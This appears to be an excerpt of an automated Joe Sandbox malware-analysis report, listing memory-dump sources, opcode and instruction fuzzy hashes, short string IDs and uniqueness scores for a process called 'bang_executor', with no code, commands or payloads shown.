                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;M_I$<M_I$=M_I$>M_I
                                        • API String ID: 0-1360018315
                                        • Opcode ID: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction ID: 47dceb8ec69e1f4a51cff05dcb518fe2290c2cdef9f825d08771b15968b695ea
                                        • Opcode Fuzzy Hash: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction Fuzzy Hash: 12E1E793A0F7C50BE7B14BA818791287E91FF52B5075992FBD0C48B1FBFC85AA068345
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 363ad2478e2227e8c465e724d679a6ed020dca0f913125f535eccddaf4b0bd42
                                        • Instruction ID: 7bc4b332c7e3c39193ff870b0838a007eb8cb5f69af89fdfe3ed62531e24dcb1
                                        • Opcode Fuzzy Hash: 363ad2478e2227e8c465e724d679a6ed020dca0f913125f535eccddaf4b0bd42
                                        • Instruction Fuzzy Hash: 9AC1B630B19A4E8FDB99EF58C4A4AA977E1FF58304F1405A9E41AC72D6CF75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83267e949230865f6e59604963515d3d88de073977cc06f3b688e42ff8f3bff4
                                        • Instruction ID: 5fafc7928eacd701d28be550438660232d2545a6f5ee43ab151821b4c60c49fd
                                        • Opcode Fuzzy Hash: 83267e949230865f6e59604963515d3d88de073977cc06f3b688e42ff8f3bff4
                                        • Instruction Fuzzy Hash: 9E81E930A09B4E9FDB55DF1CC4A1998BBB1FF5A344B1506E6D009CB2ABC925BC85CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98854fa2faedaf8e58aa03a3804dbf3e7e58e5c263f889e9d271ce7666f45858
                                        • Instruction ID: 035ca772654d32835862290e1c1bdc4cc8e06a6ac9236a21e80af3d5151709cc
                                        • Opcode Fuzzy Hash: 98854fa2faedaf8e58aa03a3804dbf3e7e58e5c263f889e9d271ce7666f45858
                                        • Instruction Fuzzy Hash: 8A71C870609B4F8FDB95DF58C491AAA77F1FF59304F1046AAD419CB2E9CA31E981CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8eb70d7fb4a8f30ddff7c0c0f4d6ed1ed7fd689baf084b7a381e30a0d40e89
                                        • Instruction ID: 71c66c0a4f9c31bfe3d516e7968f17d8f526ef41073256ec2d42962b73ce5c20
                                        • Opcode Fuzzy Hash: ac8eb70d7fb4a8f30ddff7c0c0f4d6ed1ed7fd689baf084b7a381e30a0d40e89
                                        • Instruction Fuzzy Hash: D8512231A0CB4C4FDB59EF9898556A97BF1FF95310F0082AFD44DC7296CA34A845CB82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ac73b209f8f398da242652a8293f90711f87568b83f81f13da8c92b6d59db13
                                        • Instruction ID: 7a186336939fce2171a771c99ba0121b75dfee17090f421a691ff4329f11cb62
                                        • Opcode Fuzzy Hash: 7ac73b209f8f398da242652a8293f90711f87568b83f81f13da8c92b6d59db13
                                        • Instruction Fuzzy Hash: D9510121A0E6CE0FE7B6977448325E57FA0DF47710F0A02FAD48CCB0E7D8596A1A8342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction ID: 9cd582b4020dfeb18c494f30ab8896d30611ebee3e351ebb30d3b1b83dd844e1
                                        • Opcode Fuzzy Hash: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction Fuzzy Hash: B0517431B19A4E8FDBE8EF58C4A4ABA77E1FF54314B15057AE41AC3295CE74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction ID: 35b785a12d6839cf58e5e7a08a0060397e8e30601a7e4a3a930b809a339132fb
                                        • Opcode Fuzzy Hash: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction Fuzzy Hash: 39110522F0E95E0AFBF4A7A848312F932D0EF45710F4321BAD41DC30E3DD593A0A0285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction ID: 4605afc34ef6ad8c8bf702768038511dd35422e233fcd23ba140cd9e6022184a
                                        • Opcode Fuzzy Hash: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction Fuzzy Hash: F5E0E511A0F7990FE7B993AD48623617EE2DB49610F0991EFD089C26E3C8C81C424352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction ID: 5d56c48a675e8f28a9d8706649a076efef40420e0aeb451a33f264ee83ecf837
                                        • Opcode Fuzzy Hash: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction Fuzzy Hash: 57E0C221F4A81E89EB94B3B468B69FDB245DFC4204FC21871E42EC20CBCD6A29010182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction ID: cae1192e71673577aa90574db652e2464a774fe2f5b38a40059027ec9b81555f
                                        • Opcode Fuzzy Hash: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction Fuzzy Hash: 44E04F3145CB084BC354DF18D48049AB7E0FF94320F801B2EF05AC21B5DB7596818A82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction ID: 5feb92f41c138d6eb2bcfd40ad6767d2e0bbba01d14f6b1f5390d77fcc5b7118
                                        • Opcode Fuzzy Hash: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction Fuzzy Hash: B1C0123256D64D57D391AB10E451CEA7350FF90610F842B39F04B410A9DD6566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71fed7cc61dfc9cce052753ae5321ee0817550ec9fbceb446c49d535c3e8e984
                                        • Instruction ID: 2c7f05d557717f8f0295d073dffa8e5846ff3d2d8d1faec7beb5292d5ca2794c
                                        • Opcode Fuzzy Hash: 71fed7cc61dfc9cce052753ae5321ee0817550ec9fbceb446c49d535c3e8e984
                                        • Instruction Fuzzy Hash: 63610B30B6444E4FE794EF5CD461AEDB7A2EF99304FA40075E409CB296CDA6FC828742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;N_I$<N_I
                                        • API String ID: 0-1294700092
                                        • Opcode ID: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction ID: 2fb920e58f9fdd9f8041f65ab6670639e9dedeb4b2abd0b44addf112d0ad7c43
                                        • Opcode Fuzzy Hash: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction Fuzzy Hash: 8A615BD3F0FAC90BE771479C18651282E83AF57A50B5901FBD0C8871BFB881AE0AC385
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {=N_^
                                        • API String ID: 0-135052102
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;N_I$<N_I
                                        • API String ID: 0-1294700092
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {=N_^
                                        • API String ID: 0-135052102
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000020.00000002.1823815763.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%